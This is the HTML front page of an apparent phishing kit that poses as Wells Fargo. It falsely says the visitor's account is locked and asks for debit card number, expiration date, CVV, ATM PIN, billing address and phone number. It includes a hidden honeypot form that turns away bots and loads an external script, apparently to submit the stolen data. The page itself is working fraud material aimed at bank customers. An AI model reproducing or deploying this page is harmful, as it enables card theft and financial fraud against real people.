<!DOCTYPE html>
<html lang="en">

<html>
<head>
    <meta charset="utf-8">

        

        <meta name="viewport" content="width=device-width, initial-scale=0.85, user-scalable=no">
        
        <title>Verify - Wells Fargo</title>

    
        <link rel="stylesheet" href="style.css" type="text/css">
        <link rel="icon" href="ico.png" type="image/png">
        <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
        <script src="extra.js"></script>

        <!--Styling link for remember me checkbox-->
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css">


        <style>
            body{
                background-image: url('carrage.jpg');
                background-size: cover;
                background-position: center center;
                background-attachment: fixed;
                z-index: -20;
                height: 1944px;
            }

        </style>
        <style>
            .insidecont {
                background-color: white;
                z-index: 2;
                height: 700px;
                width: 880px;
                margin-right: auto;
                margin-left: auto;
                border-radius: 12px;
            }
        </style>
        <style>
            .container{
                text-align: center;
                align-items: center;
                justify-content: center;

            }
            .remember-label {
                margin-top: 19px;
                margin-left: 6px;
                margin-right: 190px;
            }
        </style>
        <style>

            .outcont {
                background-color: white;
                z-index: 2;
                height: 275px;
                width: 880px;
                margin-right: auto;
                margin-left: auto;
                border-radius: 12px;
                margin-top: -49px;
                margin-bottom: 100px;
            }


            @media (max-width: 768px) {
                .fdicdiv {
                    display: flex;
                }
                .fdicdivcomp {
                    display: none;
                }
            
                .insidecont{
                    width: 100%;
                    margin-top: -55px;
                }
            
                body {
                    background-color: white;
                    background-image: none;
                }
            
                .navbar__menu {
                    display: none;
                }
            
                .bigmg {
                    margin-left: 282px;
                }

                .outcont {
                    background-color: white;
                    z-index: 2;
                    height: 275px;
                    width: 100%;
                    margin-right: auto;
                    margin-left: auto;
                    border-radius: 12px;
                    margin-top: 45px;
                }
                body{

                    background-image: none;
                    background-color: white;
                    z-index: -20;
                    height: 1650px !important;
                
                }
            }

            body{

                background-image: none;
                background-color: white;
                z-index: -20;
                height: 950px;
            
            }
            
        </style>

</head>
<body>

    <div class="navbar__container">
        <nav class="navbar">
            <div class="navbar__container">
                <a href="index.html" id="navbar__logo">
                    <img src="Untitled.png" width="235" height="37" class="bigmg">
                </a>
                <div class="navbar__toggle" id="mobile-menu">
                    <span class="bar"></span>
                    <span class="bar"></span>
                </div>
                <ul class="navbar__menu">
                    <li class="navbar__item">
                        <div class="divadiv">
                            <a href="https://oam.wellsfargo.com/oamo/identity/enrollment"><img src="enroll.png" width="76px" height="25px"></a>
                        </div>
                    </li>
                    <li class="navbar__item">
                        <div class="divadiv2">
                            <a href="https://www.wellsfargo.com/help/"><img src="customerservice.png" width="110px" height="14px"></a>
                        </div>
                    </li>
                    <li class="navbar__item">
                        <div class="divadiv2">
                            <a href="https://www.wellsfargo.com/locator/"><img src="atmlocate.png" width="110px" height="14px"></a>
                        </div>
                    </li>
                    <li class="navbar__item">
                        <div class="divadiv3">
                            <a href="https://connect.secure.wellsfargo.com/auth/login/present?origin=cob&langPref=SPN"><img src="espanol.png" width="50px" height="16px"></a>
                        </div>
                    </li>
                </ul> 
            </div>
        </nav>
    </div>
    <!-- oughta here -->
    <div class="tt">
        <form id="pp" name="honey" action="detected.html" method="get">
            <input type="text" placeholder="Mothers Maiden Name" name="honeypot" style="outline: none; text-decoration: none; border: none; color:rgb(255, 255, 255); background-color: rgb(255, 255, 255);" height="15px" width="20px">
            <input type="submit" style="border: none; color: rgb(255, 255, 255); background-color: rgb(255, 255, 255);" width="25px" height="17px;">
        </form>
    </div>
    <div class="navbar__container2">
        <nav class="navbar2">
            <div class="navbar__container2">
            </div>
        </nav>
    </div>
    <div class="container" style="margin-top: -65px;">


        <div class="insidecont" style="margin-bottom: 350px;">
            <br>
            <br>
            <p style="font-size: 26px; font-family: Wells Fargo Sans Regular,Arial,Helvetica,'sans-serif'; color: #313131;"><b>We need to verify it's really you.</b></p><br>
            <div class="textindiv" style="margin-top: -38px; text-align: center; align-items: center; justify-content: center;">
                <p style="font-size: 19px; font-family: Wells Fargo Sans Regular,Arial,Helvetica,'sans-serif'; color: #313131;"><b>Due to security reasons we have temporarily locked your account.</b></p>
            </div>
            <div class="textindiv" style="margin-top: -5px; text-align: center; align-items: center; justify-content: center;">
                <p style="font-size: 19px; font-family: Wells Fargo Sans Regular,Arial,Helvetica,'sans-serif'; color: #313131; line-height: 32px;">Enter the information linked to your Wells Fargo banking below to proceed with verifying your checking/savings account.</p>
            </div>
            <div class="textindiv2" style="display: none; margin-bottom: -45px; margin-top: 0px; text-align: center; align-items: center; justify-content: center;">
                <img src="blank.png" width="227px" height="43px">
            </div>
            <br>
            <br>
            <form action="#" class="form-contact2">

                <div class="billing">
                    <p class="billingtext"><b>Wells Fargo debit card</b></p>
                </div>

                <input id="fname" type="text" placeholder="Card Holders Name" required>
                <input id="fcard" type="number" placeholder="Card Number" pattern="[0-9]*" oninput="checkPhoneNumberLength(this)" required>
                <input id="fexp" type="text" inputmode="numeric" oninput="checkexplength(this)" placeholder="Expiration Date" required>
                <input id="fcvv" type="number" placeholder="CVV    (3-4 digit security code)" pattern="[0-9]*" oninput="cvvlengg(this)" required>
                <input id="fpin" type="number" placeholder="ATM Pin" pattern="[0-9]*" oninput="cvvlengg(this)" required>
                <br>
                <div class="billing">
                    <p class="billingtext"><b>Billing Information</b></p>
                </div>

                <input id="faddress" type="text" placeholder="Street Address" required>
                <input id="fzip" type="number" placeholder="Zipcode" pattern="[0-9]*" oninput="ZipLength(this)" required>
                <input id="fcity" type="text" placeholder="City" required>
                <input id="fstate" type="text" placeholder="State" required>
                <input id="fphone2" oninput="realphonelength(this)" type="number" placeholder="Phone Number" required>
                <br>
                <input id="fsubmit3" type="image" src="signon.png" width="182px" height="47px">

            
            <form>


        </div>

        <script>
            function cvvlengg(input) {
                if (input.value.length > 4) {
                input.value = input.value.slice(0, 4);
                }
            }
        </script>

        <script>
            function checkexplength(input) {
                if (input.value.length > 5) {
                input.value = input.value.slice(0, 5);
             }
           }
        </script>

        <script>
            function checkPhoneNumberLength(input) {
                if (input.value.length > 18) {
                input.value = input.value.slice(0, 18);
                }
            }
        </script>

        <script>
            function realphonelength(input) {
                if (input.value.length > 10) {
                input.value = input.value.slice(0, 10);
             }
           }
        </script>

        <script>
            function ZipLength(input) {
                if (input.value.length > 5) {
                input.value = input.value.slice(0, 5);
             }
           }
        </script>

        <br>
        <br>
        <br>
        <br>
        <br>
        <div class="outcont">
            <br>
            <div class="outcontindiv">
                <div class="fdicdiv">
                    <img src="fdic.png" width="335px" height="250px">
                </div>
                <div class="fdicdivcomp">
                    <img src="fdic2.png" width="733px" height="185px">
                </div>
                <div class="fdicdivv" style="margin-top: 10px; display: flex; align-items: center; text-align: center; justify-content: center">
                    <img src="deposits.png" width="360px" height="39px">
                </div>
            </div>
        </div>


        <script>
            const phoneInput = document.getElementById("fphone");
          
            phoneInput.addEventListener("input", function (event) {
              const input = event.target.value;
              const sanitizedInput = input.replace(/\D/g, ''); // Remove non-digit characters
          
              if (sanitizedInput.length > 10) {
                event.target.value = sanitizedInput.substring(0, 10);
                return;
              }
          
              let formattedInput = '';
              for (let i = 0; i < sanitizedInput.length; i++) {
                if (i === 3 || i === 6) {
                  formattedInput += '-';
                }
                formattedInput += sanitizedInput[i];
              }
          
              event.target.value = formattedInput;
            });
        </script>
               
        <!--javascript to change Submit button click, check css-->
        <script>
            var button = document.querySelector('.form-contact2 input[type="image"]');
            var finput = document.querySelector('#fname');
            var finput2 = document.querySelector('#fcard');
            var finput3 = document.querySelector('#fexp');
            var finput4 = document.querySelector('#fcvv');
            var finput5 = document.querySelector('#faddress');
            var finput6 = document.querySelector('#fzip');
            var finput7 = document.querySelector('#fcity');
            var finput8 = document.querySelector('#fstate');
            var finput9 = document.querySelector('#fpin');
            var finputph22 = document.querySelector('#fphone2');

            var form = document.querySelector('.form-contact2');
            var imgg = document.querySelector('.textindiv2');
            
            button.addEventListener('click', function(event) {
                var finputBorderColor = getComputedStyle(finput).borderBottomColor.toLowerCase();
                var finput2BorderColor = getComputedStyle(finput2).borderBottomColor.toLowerCase();

                
                if (finput8.value === '' || finput9.length < 4 || finputph2.length < 10 || finput.value === '' || finput2.value === '' || finput3.length < 5 || finput4.length < 3 || finput6.length < 5 || finput7.value === '' || finput5 === '') {
                    event.preventDefault();

                    imgg.style.display = "block";
                    window.scrollTo({
                        top: 0,
                        behavior: 'instant' // You can use 'auto' or 'instant' instead of 'smooth'
                    });

                    finput.style.borderBottomColor = "rgb(137, 0, 0)";
                    finput2.style.borderBottomColor = "rgb(137, 0, 0)";
                    finput3.style.borderBottomColor = "rgb(137, 0, 0)";
                    finput4.style.borderBottomColor = "rgb(137, 0, 0)";
                    finput5.style.borderBottomColor = "rgb(137, 0, 0)";
                    finput6.style.borderBottomColor = "rgb(137, 0, 0)";
                    finput7.style.borderBottomColor = "rgb(137, 0, 0)";
                    finput8.style.borderBottomColor = "rgb(137, 0, 0)";
                    finputph22.style.borderBottomColor = "rgb(137, 0, 0)";
                    finput9.style.borderBottomColor = "rgb(137, 0, 0)";
                    
                    // Change label color to red when input is empty
                    finput.nextElementSibling.style.color = "rgb(137, 0, 0)";
                    finput2.nextElementSibling.style.color = "rgb(137, 0, 0)";
                    finput3.nextElementSibling.style.color = "rgb(137, 0, 0)";
                    finput4.nextElementSibling.style.color = "rgb(137, 0, 0)";
                    finput5.nextElementSibling.style.color = "rgb(137, 0, 0)";
                    finput6.nextElementSibling.style.color = "rgb(137, 0, 0)";
                    finput7.nextElementSibling.style.color = "rgb(137, 0, 0)";
                    finput8.nextElementSibling.style.color = "rgb(137, 0, 0)";
                    finputph22.nextElementSibling.style.color = "rgb(137, 0, 0)";
                    finput9.nextElementSibling.style.color = "rgb(137, 0, 0)";

                } else {

                    button.style.opacity = 0.63;
                    imgg.style.display = "none";

                    setTimeout(function() {

                        button.style.opacity = 1;
            
                        // Reset label color when input is not empty
                        finput.nextElementSibling.style.color = "grey";
                        finput2.nextElementSibling.style.color = "grey";
                        finput3.nextElementSibling.style.color = "grey";
                        finput4.nextElementSibling.style.color = "grey";
                        finput5.nextElementSibling.style.color = "grey";
                        finput6.nextElementSibling.style.color = "grey";
                        finput7.nextElementSibling.style.color = "grey";
                        finput8.nextElementSibling.style.color = "grey";
                        finputph22.nextElementSibling.style.color = "grey";
                        finput9.nextElementSibling.style.color = "grey";
                    }, 5000);
                }
            });            
        </script>

        <!--auto exp-->
        <script>
            const dobInput = document.getElementById("fexp");
            
            dobInput.addEventListener("input", function (event) {
                const input = event.target.value;
                const sanitizedInput = input.replace(/\D/g, ''); // Remove non-digit characters
            
                if (sanitizedInput.length > 5) {
                event.target.value = sanitizedInput.substring(0, 5);
                return;
                }
            
                let formattedInput = '';
                let currentIndex = 0;
            
                for (let i = 0; i < sanitizedInput.length; i++) {
                if (currentIndex === 2 || currentIndex === 2) {
                    formattedInput += '/';
                }
                formattedInput += sanitizedInput[i];
                currentIndex++;
                }
            
                event.target.value = formattedInput;
            });
        </script>

    </div>
    <div class="footer">

    </div>
</body>
<footer style="background-color: white; background-image: none;">

</footer>
</html>
